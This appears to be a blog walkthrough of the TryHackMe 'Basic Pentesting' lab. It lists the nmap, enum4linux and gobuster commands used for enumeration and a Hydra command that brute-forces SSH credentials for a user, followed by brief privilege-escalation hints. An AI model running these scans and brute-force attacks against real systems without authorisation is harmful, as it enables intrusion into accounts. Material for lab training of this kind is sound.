TryHackMe | Basic Pentesting | Walkthrough

Basic Pentesting Write-Up

Basic Pentesting Write-Up

This write-up provides a detailed walkthrough of the Basic Pentesting room, focusing on Web App Testing and Privilege Escalation. It includes a step-by-step guide for deploying the machine, discovering exposed services, finding hidden directories, and using brute-force techniques to obtain usernames and passwords.

Summary of Key Steps:

1. Deploy the Machine

  • Connect to the network using the provided VPN configuration.
  • Visit the lp setting up the VPN.

2. Service Enumeration with Nmap

Run the following command to discover open ports and services:

nmap -sV -sC -Pn -oN webapp_basic.txt [webappIP]
  • -sV: Probes open ports to identify service versions.
  • -sC: Runs default scripts to check for common vulnerabilities.
  • -Pn: Disables host discovery.
  • -oN: Saves output to a file for reference.

Nmap Results:


PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu
80/tcp   open  http        Apache httpd 2.4.18
139/tcp  open  netbios-ssn Samba smbd
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8080/tcp open  http        Apache Tomcat 9.0.7

3. Enumerate SMB Shares

Use enum4linux to gather information about SMB shares:

enum4linux -a [webappIP] > enum.txt

4. Hidden Directory Discovery

Identify hidden directories using Gobuster:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://[webappIP]

Output:

/development (Status: 301)

Navigating to /development reveals the following files:

  • dev.txt: Mentions of Apache Struts and SMB configuration.
  • j.txt: Indicates weak credentials for user jan.

5. Username Enumeration

From enum4linux, the following users were found:


S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)

6. Password Brute-Forcing with Hydra

Brute-force SSH credentials for the user jan using Hydra:

hydra -l jan -P /usr/share/wordlists/SecLists/Passwords/darkweb2017-top10000.txt [webappIP] ssh

Output:

[22][ssh] host: [webappIP]   login: jan   password: [password]

7. Privilege Escalation

  • After logging in as jan, check for potential privilege escalation vectors.
  • Explore the user's environment for sensitive files or misconfigurations.
  • Use sudo -l to see allowed commands.

Tools Used:

  • Nmap: For network scanning and service detection.
  • enum4linux: For SMB enumeration.
  • Gobuster: For directory brute-forcing.
  • Hydra: For password brute-forcing.

This guide provides a structured approach to tackle the Basic Pentesting room, ensuring you cover all essential steps in web application testing and privilege escalation.

Comments

Post a Comment

Popular Posts